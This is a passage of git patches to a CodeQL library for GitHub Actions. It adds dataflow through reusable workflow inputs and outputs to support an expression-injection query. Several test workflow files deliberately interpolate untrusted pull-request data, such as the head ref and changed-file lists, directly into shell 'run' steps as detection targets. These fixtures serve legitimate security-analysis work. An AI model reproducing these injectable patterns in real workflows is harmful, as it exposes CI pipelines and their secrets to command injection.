super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 534eb4fe657..1e6fbd5b854 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,17 +6,32 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = TExprNode(DataFlowExpr e) +newtype TNode = + TExprNode(DataFlowExpr e) or + TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or + TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } /** - * Not used + * Reusable workflow input nodes */ -class ParameterNode extends Node { - ParameterNode() { none() } +class ParameterNode extends Node, TParameterNode { + private ParamExpr parameter; + + ParameterNode() { this = TParameterNode(parameter) } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + ParamExpr getParameter() { result = parameter } } /** - * Not used + * Reusable workflow output nodes */ class ReturnNode extends Node { ReturnNode() { none() } @@ -35,17 +50,25 @@ class OutNode extends ExprNode { } } +/** + * Not used + */ class CastNode extends Node { CastNode() { none() } } +/** + * Not used + */ class PostUpdateNode extends Node { PostUpdateNode() { none() } Node getPreUpdateNode() { none() } } -predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { arg.argumentOf(call, pos) @@ -64,7 +87,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -79,27 +102,16 @@ class DataFlowCall instanceof Cfg::Node { DataFlowCallable getEnclosingCallable() { result = super.getScope() } } -// class DataFlowCallable instanceof Cfg::CfgScope { -// DataFlowCallable() { none() } -// -// string toString() { result = super.toString() } -// -// string getName() { result = "none" } -// } /** * A Cfg scope that can be called - * There are no callables in Actions, at least not in the AST + * ReusableWorkflowStmt */ -class DataFlowCallable instanceof Cfg::CfgScope { +class DataFlowCallable instanceof ReusableWorkflowStmt { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { - if this instanceof StepStmt - then result = this.(StepStmt).getId() - else result = this.(JobStmt).getId() - } + string getName() { result = super.getName() } } newtype TReturnKind = TNormalReturn() @@ -114,7 +126,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { none() } +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } // /** // * Holds if the set of viable implementations that can be called by `call` @@ -173,11 +185,10 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Not used since we dont have Callables in the AST * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { none() } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } } /** @@ -188,18 +199,12 @@ class ArgumentPosition extends string { } /** - * Not really used since we dont have Callables in the AST but needed for the InputSig signature */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -/** - * a simple local flow step - */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } - -predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(UsesExpr uses, StepOutputAccessExpr outputRead | + exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and @@ -233,11 +238,16 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - usesOutputDefToUse(nodeFrom, nodeTo) or + stepUsesOutputDefToUse(nodeFrom, nodeTo) or runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + /** * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/lib/test/.github/workflows/test.yml index 2760a6c3d35..754105a49e6 100644 --- a/ql/lib/test/.github/workflows/test.yml +++ b/ql/lib/test/.github/workflows/test.yml @@ -13,7 +13,7 @@ jobs: fetch-depth: 0 - name: Get changed files - id: source + id: source uses: tj-actions/changed-files@v40 - name: Remove foo from changed files @@ -21,8 +21,12 @@ jobs: uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' + find: "foo" + replace: "" + - id: simplesink1 + run: echo ${{ steps.source.outputs.all_changed_files }} + - id: simplesink2 + run: ${{ github.event.pull_request.head.ref }} job2: runs-on: ubuntu-latest diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 2e358f3c30b..31bcdc256d8 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -12,7 +12,11 @@ query predicate jobNodes(JobStmt s) { any() } query predicate stepNodes(StepStmt s) { any() } -query predicate usesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(UsesExpr s) { any() } + +query predicate stepUsesNodes(StepUsesExpr s) { any() } + +query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { call.getArgument(argname) = arg @@ -42,17 +46,22 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + //any() + n.getAstNode() instanceof JobUsesExpr +} -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "simple1.yml" +} query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } +query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } -query predicate usesIds(UsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } From 3152ed71babc92524cf2f7a326c4f3a212411fad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 11:57:47 +0100 Subject: [PATCH 0015/1267] dataflow through reusable workflows --- ql/lib/codeql/actions/Ast.qll | 135 +++++++++++++----- ql/lib/codeql/actions/Consistency.ql | 3 + ql/lib/codeql/actions/DataFlow.qll | 8 ++ .../actions/controlflow/internal/Cfg.qll | 43 ++++-- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 78 +++++----- .../dataflow/internal/DataFlowPublic.qll | 42 +++++- .../.github/workflows/calling_workflow.yml | 28 +++- .../.github/workflows/reusable_workflow.yml | 21 ++- ql/lib/test/test.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/test/partial.ql | 33 +++++ 13 files changed, 300 insertions(+), 100 deletions(-) create mode 100644 ql/lib/codeql/actions/Consistency.ql create mode 100644 ql/src/test/partial.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f8347e766f..b84f884c034 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -39,23 +39,21 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } class ReusableWorkflowStmt extends WorkflowStmt { - YamlMapping parameters; + YamlValue workflow_call; ReusableWorkflowStmt() { - exists(Actions::On on | - on.getWorkflow() = this and - on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters - ) + this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ParamsStmt getParams() { result = parameters } + InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - // TODO: implemnt callable name string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ParamsStmt extends Statement instanceof YamlMapping { - ParamsStmt() { +class InputsStmt extends Statement instanceof YamlMapping { + InputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } @@ -72,12 +70,38 @@ class ParamsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - ParamExpr getParamExpr(string name) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + InputExpr getInputExpr(string name) { + result.(YamlString).getValue() = name and + this.(YamlMapping).maps(result, _) } } -class ParamExpr extends Expression instanceof YamlValue { } +class InputExpr extends Expression instanceof YamlString { } + +class OutputsStmt extends Statement instanceof YamlMapping { + OutputsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * outputs: + * firstword: + * description: "The first output string" + * value: ${{ jobs.example_job.outputs.output1 }} + * secondword: + * description: "The second output string" + * value: ${{ jobs.example_job.outputs.output2 }} + */ + OutputExpr getOutputExpr(string name) { + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + } +} + +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -117,8 +141,13 @@ class JobStmt extends Statement instanceof Actions::Job { /** * Reusable workflow jobs may have Uses children + * eg: + * call-job: + * uses: ./.github/workflows/reusable_workflow.yml + * with: + * arg1: value1 */ - JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } + JobUsesExpr getUsesExpr() { result.getJob() = this } } /** @@ -152,8 +181,11 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +/** + * Abstract class representing a call to a 3rd party action or reusable workflow. + */ abstract class UsesExpr extends Expression { - abstract string getTarget(); + abstract string getCallee(); abstract string getVersion(); @@ -168,7 +200,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { StepUsesExpr() { uses.getStep() = this } - override string getTarget() { result = uses.getGitHubRepository() } + override string getCallee() { result = uses.getGitHubRepository() } override string getVersion() { result = uses.getVersion() } @@ -183,12 +215,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlScalar { - JobStmt job; +class JobUsesExpr extends UsesExpr instanceof YamlMapping { + JobUsesExpr() { + this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) + } - JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } - - JobStmt getJob() { result = job } + JobStmt getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -200,31 +232,31 @@ class JobUsesExpr extends UsesExpr instanceof YamlScalar { private string pathUsesParser() { result = "\\./(.+)" } - override string getTarget() { - exists(string name | - this.(YamlScalar).getValue() = name and - if name.matches("./%") - then result = name.regexpCapture(this.pathUsesParser(), 1) + override string getCallee() { + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if name.getValue().matches("./%") + then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else result = - name.regexpCapture(this.repoUsesParser(), 1) + "/" + - name.regexpCapture(this.repoUsesParser(), 2) + "/" + - name.regexpCapture(this.repoUsesParser(), 3) + name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 3) ) } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { - exists(string name | - this.(YamlScalar).getValue() = name and - if not name.matches("\\.%") - then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } override Expression getArgument(string key) { - job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -287,6 +319,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { /** * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` + * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -294,9 +327,11 @@ class JobOutputAccessExpr extends ExprAccessExpr { JobOutputAccessExpr() { jobId = - this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + this.getExpression() + .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and varName = - this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + this.getExpression() + .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } string getVarName() { result = varName } @@ -305,7 +340,35 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(varName) = result + ( + // A Job can have multiple outputs, so we need to check both + // jobs..outputs. + job.getOutputStmt().getOutputExpr(varName) = result + or + // jobs..uses (variables returned from the reusable workflow + job.getUsesExpr() = result + ) + ) + } +} + +/** + * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. + * eg: `${{ inputs.foo}}` + */ +class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { + string paramName; + + ReusableWorkflowInputAccessExpr() { + paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getParamName() { result = paramName } + + Expression getInputExpr() { + exists(ReusableWorkflowStmt w | + w.getLocation().getFile() = this.getLocation().getFile() and + w.getInputs().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/Consistency.ql b/ql/lib/codeql/actions/Consistency.ql new file mode 100644 index 00000000000..fa3a2bc9e5c --- /dev/null +++ b/ql/lib/codeql/actions/Consistency.ql @@ -0,0 +1,3 @@ +import DataFlow::DataFlow::Consistency + + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index d1e714e8fbc..5040865be1d 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,4 +7,12 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic + + /** debug */ + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { + import DFIC::MakeConsistency + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ac8ab616e3e..057d7872ee3 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - private class JobScope extends CfgScope instanceof JobStmt { } + class JobScope extends CfgScope instanceof JobStmt { } } private module Implementation implements CfgShared::InputSig { @@ -123,7 +123,7 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(ReusableWorkflowStmt).getInputs(), e) or first(scope.(JobStmt), e) } @@ -148,14 +148,11 @@ private import Completion private import CfgScope private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { - override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } -} - -private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getParamExpr(_) and l = child.getLocation() + (child = super.getInputs() or child = super.getOutputs()) and + l = child.getLocation() | child order by @@ -164,7 +161,35 @@ private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof } } -private class ParamExprTree extends LeafTree instanceof ParamExpr { } +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getInputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getOutputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b2ab51e28fa..3e6a6141767 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -127,7 +127,7 @@ private class EventSource extends RemoteFlowSource { private class ChangedFilesSource extends RemoteFlowSource { ChangedFilesSource() { exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and + uses.getCallee() = "tj-actions/changed-files" and uses.getVersion() = ["v10", "v20", "v30", "v40"] and uses = this.asExpr() ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 223ff305ba4..ead312d8af6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -26,7 +26,7 @@ class AdditionalTaintStep extends Unit { private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | - u.getTarget() = "mad9000/actions-find-and-replace-string" and + u.getCallee() = "mad9000/actions-find-and-replace-string" and pred.asExpr() = u.getArgument(["source", "replace"]) and succ.asExpr() = u ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1e6fbd5b854..02b7de847e3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -6,38 +6,7 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = - TExprNode(DataFlowExpr e) or - TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or - TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } - -/** - * Reusable workflow input nodes - */ -class ParameterNode extends Node, TParameterNode { - private ParamExpr parameter; - - ParameterNode() { this = TParameterNode(parameter) } - - predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) - } - - override string toString() { result = parameter.toString() } - - override Location getLocation() { result = parameter.getLocation() } - - ParamExpr getParameter() { result = parameter } -} - -/** - * Reusable workflow output nodes - */ -class ReturnNode extends Node { - ReturnNode() { none() } - - ReturnKind getKind() { none() } -} +newtype TNode = TExprNode(DataFlowExpr e) class OutNode extends ExprNode { private DataFlowCall call; @@ -76,6 +45,8 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) + // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) + // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -97,21 +68,27 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + string getName() { result = super.getAstNode().(UsesExpr).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } /** * A Cfg scope that can be called - * ReusableWorkflowStmt */ -class DataFlowCallable instanceof ReusableWorkflowStmt { +class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getName() } + string getName() { + if this instanceof ReusableWorkflowStmt + then result = this.(ReusableWorkflowStmt).getName() + else + if this instanceof JobStmt + then result = this.(JobStmt).getId() + else none() + } } newtype TReturnKind = TNormalReturn() @@ -188,7 +165,7 @@ ContentApprox getContentApprox(Content c) { none() } * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } } /** @@ -231,20 +208,25 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getInputExpr() = astFrom + ) +} + /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) -} +predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } /** - * a simple local flow step + * a simple local flow step that should always preserve the call context (same callable) */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } @@ -252,8 +234,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global * variable. + * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node node1, Node node2) { none() } +predicate jumpStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 41be90718d8..80f504963b9 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -44,6 +44,28 @@ class ExprNode extends Node, TExprNode { override AstNode asExpr() { result = expr.getAstNode() } } +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private InputExpr parameter; + + ParameterNode() { + this.asExpr() = parameter and + parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + InputExpr getInputExpr() { result = parameter } +} + /** * An argument to a Uses step (call) */ @@ -51,12 +73,30 @@ class ArgumentNode extends ExprNode { ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { - this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Cfg::Node node; + + ReturnNode() { + this.getCfgNode() = node and + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "return " + node.toString() } + + override Location getLocation() { result = node.getLocation() } +} + /** Gets the node corresponding to `e`. */ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml index 3b0ab8f18d3..9aafe1189ef 100644 --- a/ql/lib/test/.github/workflows/calling_workflow.yml +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -1,18 +1,38 @@ -on: push +name: Call a reusable workflow and use its outputs + +on: + workflow_dispatch: jobs: - call-workflow-1-in-local-repo: + call1: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-2-in-local-repo: + call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-in-another-repo: + call3: uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit + + job1: + runs-on: ubuntu-latest + needs: call1 + steps: + - run: echo ${{ needs.call1.outputs.workflow-output }} + job2: + runs-on: ubuntu-latest + needs: call2 + steps: + - run: echo ${{ needs.call2.outputs.workflow-output1 }} + - run: echo ${{ needs.call2.outputs.workflow-output2 }} + job3: + runs-on: ubuntu-latest + needs: call3 + steps: + - run: echo ${{ needs.call3.outputs.workflow-output }} diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml index f31c8a63d74..45c177edecb 100644 --- a/ql/lib/test/.github/workflows/reusable_workflow.yml +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -6,13 +6,28 @@ on: config-path: required: true type: string + outputs: + workflow-output1: + value: ${{ jobs.job1.outputs.job-output1 }} + workflow-output2: + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true jobs: - triage: + job1: runs-on: ubuntu-latest + outputs: + job-output1: ${{ steps.step1.outputs.step-output}} + job-output2: ${{ steps.step2.outputs.all_changed_files}} steps: - - id: sink - run: echo ${{ inputs.config-path }} + - id: step1 + env: + CONFIG_PATH: ${{ inputs.config-path }} + run: | + echo ${{ inputs.config-path }} + echo "::set-output name=step-output:: $CONFIG_PATH" + - name: Get changed files + id: step2 + uses: tj-actions/changed-files@v40 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 31bcdc256d8..8d558cbaacd 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -48,7 +48,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof JobUsesExpr + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -66,3 +66,5 @@ query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } + +query predicate scopes(Cfg::CfgScope c) { any() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4af1e2c286a..2fe6f17dfb6 100644 --- 